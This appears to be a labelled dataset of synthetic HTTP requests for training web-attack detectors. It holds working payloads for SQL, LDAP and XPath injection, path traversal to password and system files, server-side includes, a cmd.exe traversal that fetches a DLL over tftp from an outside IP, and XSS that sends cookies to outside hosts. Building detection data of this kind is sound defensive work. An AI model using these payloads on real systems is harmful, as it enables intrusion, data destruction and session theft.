GET /GgN1Ha/eCRbeD/eP.swf? HTTP/1.1
Host: 217.92.253.203:80
Connection: close
Accept: text/*, application/*, audio/basic;q=0.1
Accept-Charset: iso-2022-kr;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: n=7t7z
Client-ip: 161.201.44.66
Cookie: 1Foc=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;hWatsTwrq=608599
Cookie2: $Version="569"
Date: Wed, 31 Mar 04 01:44:47 GMT
Expect: rsaf2q
From: Uglt@gX3ubtt.gov
If-Modified-Since: Fri, 30 Apr 10 04:21:58 GMT
If-Unmodified-Since: Thu, 15 Nov 07 20:59:48 GMT
If-Match: "gh.o@XcgXzA5aBD"
If-Range: *
Max-Forwards: 46
MIME-Version: 2.6
Pragma: rO2at='NMeceb'
Authorization: Crdo naani=coy9ts
Range: 245987-,327-287216
Referer: http://dhrehot.uk/TI0n/l7ntutmN/akhu7t1r/mfde0a.mp3
TE: trailers
User-Agent: e5oTslin
UA-OS: Windows 95
Via: FTP/3.3 251.137.158.146:570, e7tanx/7.9 www.hhfss.tiff, 5.9 www.7dcasea.htm
Transfer-Encoding: nmhd; ernggzoE=sievas
Upgrade: e8tdi/9.1
Warning: 082 122.217.60.86 "2yhqit" "Wed, 08 Feb 06 22:21:01 CET"
X-Forwarded-For: 232.217.218.144

null

End - Id: 46060
Start - Id: 35174
class: SqlInjection
GET /ekpHn9U3Q/CX8jccRB/t5nce/tSepBO0aCa/s1QFfvqKTCk6l/4sgafwxs8mtirlpowa/cdCAIv@B/lzNKNW/uzO/mrtSta/5b0utmSOhsczrtoulad/haaeanfunrheajThtb.cfm?.KzuRyrXU=h%40%3Fen&iOaduenpgasnwe=Ses%27+%29%3B++++DEL%2F**%2FETE++++FROM+users+++WHERE++upper%28username%29+++%3D++upper%28++++%27admin&cce=etc%29sl2ea+%27tlcTIa HTTP/1.0
Host: 104.188.56.59:87706
Connection: close
Accept: video/*;q=0.3, video/quicktime, video/*;q=0.6
Accept-Charset: isiri-3342, koi8;q=0.8, shift_jis;q=0.7, iso-10646-ucs-2;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=01908
Client-ip: 132.54.240.29
Cookie: nllvjeNuomde=t;hsUCr69fjKN=0173;suil8irTmnnoul=yz$dnnEt:e;ndsvdc=bslseg~ l:xseh)iR;KIt3=Ctjpdps5soD;wtdantwiak=58317244
Cookie2: $Version="07"
Date: Thu, 14 Oct 04 01:26:17 UTC
ETag: "BzQQt1QdsKQpe0qglp"
Expect: itEV
From: as5oeh@nl7ehee.ch
If-Modified-Since: Sat, 02 Apr 05 01:08:29 UTC
If-Unmodified-Since: Wed, 08 Nov 06 09:36:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 974
MIME-Version: 6.6
Proxy-Authorization: NTLM bWM1dG80b0x0MjBzYWFzaXVmZXRzczlyM211NG5yaHR2YjNtbW5zY25sZTlsNWZv
Authorization: ygitr fiyucfot=Ceeh7ale
Range: -619874,-90
Referer: /telaUfi/esvAarr/i54i/Eoaee/laoOn8s.css
TE: chunked;q=0.2,trailers
User-Agent: cyMrhxgq4siewpnjfhN
UA-CPU: StrongARM
UA-Disp: 1579,9873,8
Via: 5.9 32.176.138.175
Transfer-Encoding: gzip
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35174
Start - Id: 41752
class: SqlInjection
GET /3sa/czyt/uaisd8riosmrh5dusna.gif?Leddt7tse6hh=OR++++%27ebuieaeO%27++++%3D++++N%27++++%27&ooeoltnscGscus=fOHG1Euv HTTP/1.1
Host: 213.128.110.137
Connection: close
Accept: text/*, audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 122.67.58.101
Cookie: Angr62iado=tta;i4heotit7Eaua=244287;7riilaah=ybdenii 8uost;eaon=eQsv7rJ3is;cer1u4oemearals=t8l
Cookie2: $Version="2"
Date: Tue, 16 Mar 04 03:13:12 CET
ETag: "4K2mazPqrLOm65B"
Expect: crar=tsunz
From: lehFo@eioiwni.cz
If-Modified-Since: Sun, 27 Jan 08 13:17:56 UTC
If-Unmodified-Since: Mon, 04 Jan 10 18:15:48 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic cGI2bXI6c2l0eHNubVM=
Authorization: 2nSde2 mi07s=3lgR
Range: -69404,-1
Referer: /jnuielS/oiueta.wmn
TE: trailers,gzip;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 3.9; sl-o5; rv:4.8.5) Gecko/73065330
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8272x964
Via: adhdw/2.9 www.dbak6.png, 2.7 122.247.120.158:732, 5.4 www.dy2a.html
Transfer-Encoding: compress
Upgrade: nrm/7.6, ee0ei/0.3
Warning: 709 www.r6wrni3s.jpg "mspeoetalDMtssrEec" "Wed, 02 Nov 05 08:37:49 CET"
X-Forwarded-For: 116.9.109.254
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41752
Start - Id: 37742
class: LdapInjection
GET /ethntAraqp8ai3ciiQ/U2Pm9ix0-5C/1edreie/sy@UQs/nGjX1QfJ6lxbQZSnI/t1.asp?phpyhrgqTBRCHn=rmca8bTeo&tstsstpnil=ai%29&ao=rYaEasdsEtu&riet=05954&nedn=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&atv9epusz4ftiic=sueechoeei0w2&d1sn=aowOM&BGSNe2qevalQ4=60337 HTTP/1.0
Host: 8.52.105.80:80
Connection: empis
Accept: application/*;q=0.7
Accept-Charset: x-mac-ce, utf-8;q=0.3, iso-8859-2, iso-10646-ucs-2, x-mac-arabic
Accept-Encoding: identity, gzip;q=0.1, identity
Accept-Language: td-mbj, bhjn-tiacc, or-0r;q=0.6, en7s-hE;q=0.9
Cache-Control: max-stale=6
Client-ip: 176.160.67.197
Cookie: 5in6set=$pho96rrbHttasr location;Ytsit=9692834
Cookie2: $Version="7"
Date: Mon, 01 Jun 09 12:18:44 UTC
ETag: "O7n8cheml6sy0-OowP8"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Sat, 09 Dec 06 09:03:57 GMT
If-Unmodified-Since: Mon, 17 Dec 07 24:28:05 UTC
If-Match: "72I_uXwtGbmvnQHen"
If-None-Match: *
If-Range: Mon, 21 Dec 09 23:37:20 UTC
Max-Forwards: 6688
Pragma: no-cache
Authorization: NTLM ZE8waXc1bXFvT3dlZXhodGVvczZySWhyc2xhaGlTNXljdFVvT3RsTGFQcg==
Range: 79793-4
Referer: /cwmAf5/RnTv/hlgehnoe/8t5nj.jpeg
Trailer: Date
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 1.6; bs-Si; rv:0.8.2) Gecko/66244111
UA-CPU: MIPS
UA-Disp: 242,7372,32
UA-OS: Linux
UA-Color: color32
Via: FTP/4.7 www.dgdpewo.tiff, HTTP/8.7 www.flws.html
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 3350612
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37742
Start - Id: 45365
class: PathTransversal
PUT /i3o/eelsxmtaoestmyew/lYG-QY0D/aboeurpcshe/tflnG5yQt/scriptYhshutdownF8pEJr6I/l3.rd.js? HTTP/1.0
Content-Length: 78
Content-Language: nNtsnoa
Content-Encoding: gzip
Content-Location: http://www.ejaq.net/b0en/cnnr/sceaht/te7daah/t0ehBf.jsp
Content-MD5: Zjd0SG5ZejJvaGFObG9kcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 May 09 20:15:23 UTC
Last-Modified: Wed, 07 May 08 15:41:40 CET
Host: www.anlxspa.ch:80
Connection: keep-alive
Accept: video/*, image/*, application/x-tar;q=0.9
Accept-Charset: x-mac-turkish, iso-10646-ucs-2, x-mac-arabic;q=0.5, x-mac-greek
Accept-Encoding: 
Accept-Language: f-os;q=0.1, SSeh-Ov;q=0.7
Cache-Control: no-transform
Client-ip: 76.203.238.234
Cookie: seNgsuctstazet= 2 ;e9z=scriptsyav znf;cois=62593119;replaceccJlikeY=2107424111;lt=cQNElKBKr;ZyY8ya8GzRi=9
Cookie2: $Version="0"
Date: Tue, 06 Oct 09 19:34:39 CET
ETag: W/"B9SBjm1lLCiZpvnPjtU"
Expect: 100-continue
If-Modified-Since: Fri, 21 Apr 06 15:07:50 CET
If-Unmodified-Since: Tue, 20 Jul 04 05:38:07 GMT
If-Match: "tn84.XWBII__-9w@i574"
If-None-Match: "xKe7vNp18q9iB1QsC2j"
If-Range: Fri, 07 Dec 07 18:57:02 UTC
Max-Forwards: 33
MIME-Version: 8.8
Pragma: nir=y3reici
Proxy-Authorization: Basic c2V1cnRtcjpkZTF1
Authorization: NTLM dW41NXJjaVRlcmVpVGNidGhhN25FcHNsbnRvaWh3aWluZGV6M3NvZQ==
Range: 53-,6570-433377,-5771
Referer: http://www.lh7ij.ch/wain5ith.rar
TE: trailers,gzip;q=0.4
Trailer: Referer
User-Agent: 9nihGnztYe (szZVQx5_q.; eu.0WKR6gf; a0gfTtK; tWX3w7Bz)
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Pixels: 441x030
Via: 4.2 80.132.73.161:03802, FTP/5.3 169.59.183.25
Transfer-Encoding: gzip
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hoSyfXavi1oa98=..\..\..\..\..\..\..\..\..\WINNT\system.ini

End - Id: 45365
Start - Id: 49112
class: XPathInjection
GET /ilsTvdukyecrjy78u/ux3BBN/nSuFwgvWEvmsi/F-Ietc8CDZ/nsd8/el7ucc9Tyryqlnaat/cewt40ewiottcan/Yhm7SdVt.nG_gZs/n6nYBUGOoo_O8sDSlIS9/dmy/ri0@.shtml?aan=n%25ojlsreoltelnetwai3&61sww=%3Bn8%28tmffl3a+r24d&wihs=63940+or++eeifet%2FrOc%2FeewB%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D22%5D++++or+709%3D&ciUdhdfismhhn=iENkCoC2HW9&stnuno=33&arlopoisolg=+%3Eestyles&oecaeyrtwHod=wti-htoui&iBTHn=enee%3C+nyfw4n%40 HTTP/1.1
Host: www.ajd29zA.cz:1143
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=06690
Client-ip: 55.5.98.251
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Sun, 25 Apr 04 05:36:58 UTC
ETag: "HJSkhgk7YNZkVCt5Kax"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Tue, 02 Mar 04 06:30:44 GMT
If-Unmodified-Since: Sat, 06 Dec 08 04:43:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8438
MIME-Version: 8.7
Pragma: 1jjer=aiihc
Proxy-Authorization: oevat nzIsEaox=dredr
Authorization: srrgd Goa3th=mstd
Range: 1-
Referer: /cwy4elo/aaNa/Dileovh/okfntd/2n8z.htm
TE: chunked,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/1.8 (compatible; Konqueror/9.4; Open BSD i386; yasdth; op5a3m; tithnt5)
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: compress
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 856 173.35.211.19 "ihersc3ga8taanoissh" 
X-Forwarded-For: 0.51.163.102
X-Serial-Number: 2617169573
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49112
Start - Id: 47561
class: XSS
GET /ktrehyr2oc7shgae/nn2nhprl1A/Hgoyuctz8gt/aQ4e8.jpeg?neNGLoe6k=n&aursDNm=6ihsnnawe4tmue&neW=dservices+sTriunione&5fsaab=t%3DO&dnenn8=6r%7Cr&dAwoehiasuemnai=sersrstuirj&NmlmMIME-=%3Ca++href++%3D++%22+javas%26%2399%3Bript%26%2335%3B%5Balert+++%28%27MUdxhr5uc%27%29%3B%5D+++%22+%3E&V4hFwso=bos&seAddnk=oghF&nleqs5QpasSerr=6703092809&CvbscriptUlS3=gan9y_bW HTTP/1.1
Host: 3.12.216.227
Connection: ezfeer
Accept: */*;q=0.2
Accept-Charset: utf-7, iso-2022-jp;q=0.3, x-mac-arabic, windows-874, iso-8859-4;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 19.138.115.203
Cookie: ipaln=zeF75;etiiqSe4osjv=oi4;olspha2tHes=0dine
Cookie2: $Version="143"
Date: Thu, 04 Mar 10 01:03:31 UTC
ETag: "JI9Pavis6Uc7TXF"
Expect: snnoir=adltaio;te7rrx=Jsofg
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Mon, 09 Nov 09 06:52:54 GMT
If-Unmodified-Since: Sun, 09 Aug 09 16:54:39 GMT
If-Match: "dhxepZko@rox2ODnS@TO"
If-None-Match: "jqvrFjIShiJkSuVRclO"
If-Range: Fri, 26 Aug 05 04:56:05 UTC
Max-Forwards: 7609
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: NTLM ZzB3ZXNld254ZmlhcjdkN25ldHNZdmduaWVwb25BbmJjZ2VFN2RoY3Njb2lmaXR1
Range: 946-214738,54330-8
Referer: http://dsRg6h2.be/vgzc39ti/nyo9.swf
TE: deflate;q=0.1,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.8 (compatible; MSIE 9.6; Mac OS X; shh5cNewhi)
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 417x368
Via: 6.1 248.227.109.9
Transfer-Encoding: l2arlc
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 57604389
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47561
Start - Id: 41659
class: SqlInjection
GET /etutnnnmnooTgoht3lf4/ne0p91sajeenn0/yoonysl/mZQDgbFySXoa/ibSQXHUa2Vs.-o5S/stL4xtermpt/malyxdnreaeaanc3Bs/ICMAC0Z6/VVFd/Xinsert6orbinJHew.jsp?EevtOkTetg=945904741&o8yrssn=211205886&idcdephdr=e%2Fjdiv-DaelCsn-iiC&hxVIhttpservices9Fv=ubt+dpkdni0replace&cptug2=6241690&BniEalv=k2zfoV&thnYinetdo=msP%40Kf3&l2e02aayrai=m74&tkn4m=rI4SFqgzTh&wsock_streamWwopenmnetcatstdinEmaila=i+kmail8&heqinqtknd=+%7Ca7%7C&Gxphp-9RVsTqC=opag&cguisapg8O3=1c7e&eTWaIEssln4pb=OrigText%27OR%27tg4e%27+%3D++%27Wepoj8R%27 HTTP/1.1
Host: 76.236.133.137
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tltna-slHe, 8kws6NJr-pd
Cache-Control: no-transform
Client-ip: 81.124.37.120
Cookie: z_36E4Q=irl~oeiu0o]htfxr phpp;tp=8027
Cookie2: $Version="6"
Date: Sat, 16 Feb 08 09:53:33 UTC
ETag: "L82TrxVO5n5XlbEpUI"
Expect: tdqm
From: oseas@soacs.biz
If-Modified-Since: Fri, 13 May 05 09:37:10 GMT
If-Unmodified-Since: Thu, 21 Apr 05 04:40:33 CET
If-Match: "hquv3Vog_ZWaetd"
If-None-Match: "ZrEIaWe6QQnjlnf6iTt"
If-Range: "kUR6PynGPM1Y0p4Tg"
Max-Forwards: 6348
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: ebDoe1 e2o6goee=Atbb0aec
Range: 0-,-4,4860-288700
Referer: http://www.oindas6.be/ahphxa0d/hjaa1D/anns.sh
TE: deflate,gzip;q=0.4,chunked
Trailer: If-Range
User-Agent: Mozilla/7.6 (Windows; U; WinNT 3.2; Ec-wt; rv:5.6.8) Gecko/03862181
UA-CPU: MIPS
UA-Disp: 627,8726,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/0.4 www.stgRwi5.png:3938, FTP/8.8 218.220.4.225:8135, FTP/0.0 183.219.30.169
Transfer-Encoding: compress
Upgrade: eelO/2.0, utnt/9.3, aSn/6.5
Warning: 553 www.mekn.jpg "dieiIfit2dki8e" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41659
Start - Id: 43894
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.1
Host: www.roBh.net:9019
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-cyrillic
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 132.194.132.1
Cookie: mn4=oOadminafwuchildnZ-o\tc;1aaenlaf3rqa=Ilogmwindow.openw 1te6ot
Cookie2: $Version="05"
Date: Wed, 07 Feb 07 05:35:02 GMT
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: pni8hEt@brlOo.ch
If-Modified-Since: Mon, 22 Nov 04 13:02:31 UTC
If-Unmodified-Since: Mon, 11 Apr 05 20:06:47 UTC
If-Match: "8Srd7BqaI14qLa_DNIbX"
If-None-Match: "xmMfbKlWK96TC2ZB"
If-Range: Wed, 13 Oct 04 08:34:10 GMT
Max-Forwards: 1
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: P6xano coke=eW4hee
Range: 3121-127,822-
Referer: /8d8y1m.avi
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/9.6 (Windows; U; WinNT 2.8; st-kl; rv:7.3.0) Gecko/79525101
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: np1euh; iwnbdsd7=rBi7ta
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 83787585359566262
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43894
Start - Id: 42066
class: SqlInjection
GET /hY3W9zZsIfM.2XRnTxbQ/KTWF7S2o3/riwltmlrd6yje9ecme/wwWwv/ozIEpL7P3rPqTZCgKE/g0xeeSgl.html?Inhsa=%3Balter++table+++++degenerata+++set+password+++%3D++%27andrh%27++where+++++name+++++%3D++%275ednuime%27%3B&poYyIaersoO=%28p+&Sdyr@=1485864&lrhe=d9Yc&nijdtelnetdelete3=A6tnw4ado HTTP/1.1
Host: www.0laoistv.ch:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-chinesetrad;q=0.9
Accept-Encoding: deflate, identity, gzip, gzip, compress
Accept-Language: qta-ctllpn;q=0.0, l9-repnon, oa-ehJnTpgu;q=0.0, esuaah-tt;q=0.9
Cache-Control: max-stale
Client-ip: 147.90.51.52
Cookie: lrt0NSarsahreO=o0ddD)eAi3e;6eaLbdetti3=7322632;gl=000033411
Cookie2: $Version="58"
Date: Fri, 09 Oct 09 11:11:30 GMT
ETag: W/"Z8zmZnMnwtBnFN6xu2"
Expect: dntttuy
From: rnlon@elnNaanan.fr
If-Modified-Since: Mon, 09 Aug 04 07:23:49 UTC
If-Unmodified-Since: Fri, 24 Aug 07 09:22:48 CET
If-Match: "too6CXaTpPTIHKKIJ"
If-None-Match: *
If-Range: "53ArFZHy.hlDtssOX"
Max-Forwards: 026
MIME-Version: 0.9
Pragma: b='obv'
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: traqii ecobe=djE3usta
Range: 97-55
Referer: http://ktae6.uk/o6Ed/Cnthrb/fytr/s2hnPw.shtml
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 7.4; ej-er; rv:7.9.1) Gecko/80158203
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9544x100
Via: 2.0 56.118.144.33
Transfer-Encoding: compress
Upgrade: rRlEh/1.9
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 702887096
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42066
Start - Id: 35014
class: SSI
GET /Pyi/oer7at8tps4adalt44en/-l/teiisoemnu/yoTav8ue/8okgm/ne.tiff?tb=%3C%21--+%23odbc+++connect%3D%22rhir6st%2CDna%2CIrdtt%22++++statement%3D%22select+++*+from+nab%22--%3E HTTP/1.1
Host: www.21scex.com:7139
Connection: keep-alive
Accept: application/x-tar;q=0.9, video/*, application/*
Accept-Charset: gb2312;q=0.3, isiri-3342;q=0.1, big5;q=0.1, koi8;q=0.6, x-mac-chinesetrad;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: waIoHas-wa, un-esbey;q=0.5, a-neG9A, aan-ami01te;q=0.1
Cache-Control: no-cache
Client-ip: 4.200.130.247
Cookie: OlSeeItp=0288;durnridl=r yhc;tU6leeersanr=ndeEg|;eIna=execj
Cookie2: $Version="03"
Date: Tue, 28 Apr 09 19:55:07 UTC
ETag: W/"0youiSpW_y41JK@H"
Expect: 100-continue
If-Modified-Since: Mon, 16 Nov 09 06:52:58 UTC
If-Unmodified-Since: Mon, 08 Mar 04 15:54:56 GMT
If-Match: *
If-None-Match: "EpxhN-4iy1uzbvI"
If-Range: Mon, 20 Apr 09 12:11:18 CET
Max-Forwards: 41
MIME-Version: 0.3
Pragma: ims=nossnbl
Authorization: Basic cm1ub3RpOm5lbFJ0
Range: 4978-84,830195-719467,3968-5663
Referer: /niit4/patna1n.nsf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 9.9; nu-sg; rv:0.2.8) Gecko/51043059
Via: 9.8 40.97.137.62
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35014
Start - Id: 46590
class: XSS
GET /mL085NPTAUKS/pufcorn/EeismdEeL/em0lumlewotmwaeop/nge/sebptorlOpIlsnGe3en/PVV.7Va2@J/q_IxLb9N5u/9MO/TtAneIL8Lfeae80/tgIKEFgctpQkcdcVYqA/ppZNtuitxJSst.jsp?2o5=4&hn=eaieh6e&kN3DgrjMNsG=liblna&h5elnhDeaigaa=6&erAlN=rdRl%29EsnullOhrnph-%25oC HTTP/1.0
Host: www.Xao7.be
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, compress, compress;q=0.8, identity;q=0.8
Accept-Language: *
Cache-Control: s=sjhmI1
Client-ip: 222.227.138.4
Cookie: e5mmoisuo=83
Cookie2: $Version="4"
Date: Fri, 16 Nov 07 22:27:06 GMT
ETag: W/"i_iTdQu4_UB@-BG"
Expect: 100-continue
From: t0epeeaC@htiute.ch
If-Modified-Since: Sun, 16 Apr 06 21:07:55 UTC
If-Unmodified-Since: Wed, 26 Sep 07 06:54:20 UTC
If-Match: "Rsx0uDBbGRsxCdELJF"
If-None-Match: "tz2B.2h-l.9Ly-RL62"
If-Range: Fri, 05 Aug 05 14:31:55 UTC
Max-Forwards: 40
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: Basic Z3RLdGJkOnN1cGFl
Range: -65951,35-456894
Referer: http://OddbO.cz/ernrie/ferw/aodetaoe/t30wh.exe
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: [\xC0][\xBC]script    >[document.location.replace('http://www.isiemaie.com/cgi-bin/ases.cgi'+document.cookie);][\xC0][\xBC]/script>
UA-CPU: PowerPC
UA-Disp: 3779,9058,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 5.5 www.erwyaae.jpeg, 3.9 www.seNutos.htm, FTP/1.2 31.154.255.185
Transfer-Encoding: bwetg; ntilrcie=t91oci
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 051 74.151.102.193 "tps9iyOEh" 
X-Forwarded-For: 226.8.111.124
X-Serial-Number: 015353495234
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46590
Start - Id: 45168
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: www.lbuenom.fr
Connection: leta
Accept: application/*, text/*;q=0.4, video/quicktime;q=0.6
Accept-Charset: *
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.9
Cache-Control: max-stale=79958
Client-ip: 49.63.221.221
Cookie: bsmSo=oansait;V5CTXjwmKNR=wLYfE_d
Cookie2: $Version="70"
Date: Tue, 10 Jul 07 20:41:25 GMT
ETag: W/"nusweEuleB7R8Ih"
Expect: hness
From: eawnt@ds5lo.de
If-Modified-Since: Sun, 29 Jan 06 23:54:29 UTC
If-Unmodified-Since: Tue, 02 Oct 07 19:20:38 CET
If-Match: *
If-None-Match: *
If-Range: "axLjniKNo@mfU5U"
Max-Forwards: 8410
MIME-Version: 7.3
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: Digest algorithm=MD5-sess
Range: 551-3881,-846
Referer: http://www.rOeie5.uk/wrrU/nktmksoS/or4aea/tdxnone.doc
TE: deflate;q=0.3,chunked
Trailer: Date
User-Agent: ibkla_ http://www.mFhte.de
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: 9.9 www.seocE.png
Transfer-Encoding: tlEn5; ceeeeer=geezwhe
Upgrade: iis5w/2.9, 8fLc/3.7, wahe/2.1, ossrxy/5.0
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45168
Start - Id: 47921
class: XSS
GET /rt/Ifnandkrgshutdown/l_RkFwrCYUP5ZZ6@f/a3salOIsfehlti/einsa4msoarstphglhlc/essyowota/Lpjoeha/x6j1F@@WR4B/dtirYDyCndt88tas.nsf?V6fO79sFBM=7993916429&sy7=esock_streamharzautoexecf%3B%5Dmn&dsullaoTu=%26%7B%5Bwindow.open%28%27http%3A%2F%2F235.182.219.123%2Fge.mdb%27%2Bdocument.cookie%29%3B%5D%7D%3B&guemddZedinh=ortcAespnqmrsfdee&xwttIjG0awuzGy=an3viK&noIsoImpsepu6a=mmi+qurr+svncsock_streamlt&nneae=pbHgv-0Z4DuM&n4FZtHnph-gkV=6&sksno8ehhrs=Yidsr&ix=6352747991 HTTP/1.0
Host: www.aeCcbais.biz
Connection: keep-alive
Accept: image/png, audio/*;q=0.9
Accept-Charset: iso-2022-jp;q=0.2
Accept-Encoding: deflate;q=0.7, identity
Accept-Language: p-esnioEn, htect-yM;q=0.6, Djsliu-o;q=0.8, raro2e-2N4hte;q=0.9, ML-Uom;q=0.0
Cache-Control: only-if-cached
Client-ip: 249.54.30.10
Cookie: ehrneiekgy=hgiise;IULVDFwZN5V=99872;Mqti=56;nctmpBZzs7winntwhere=25889;includeCMcopyZinsertPm_ET=7rnoNmr7;aexb92ebkeI=61372
Cookie2: $Version="20"
Date: Tue, 07 Feb 06 22:28:29 CET
ETag: W/"_.0C6nefcSBlQWvp"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: ayedann@u5os6hn.st
If-Modified-Since: Fri, 23 Sep 05 14:54:03 GMT
If-Unmodified-Since: Thu, 22 Dec 05 19:10:49 GMT
If-Match: *
If-None-Match: "T9g_wsGtHyAHRhRw@z"
If-Range: *
Max-Forwards: 824
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: acdd pntas=drlmae
Authorization: Basic ZHphZzJFNjpodDht
Range: 16-10857
Referer: http://xq1the.it/oiea3h/gaEhr46i/msatne/yHSitoh.msf
TE: gzip,deflate;q=0.2,trailers
Trailer: Via
User-Agent: Ylre (wYsssTHJ7)
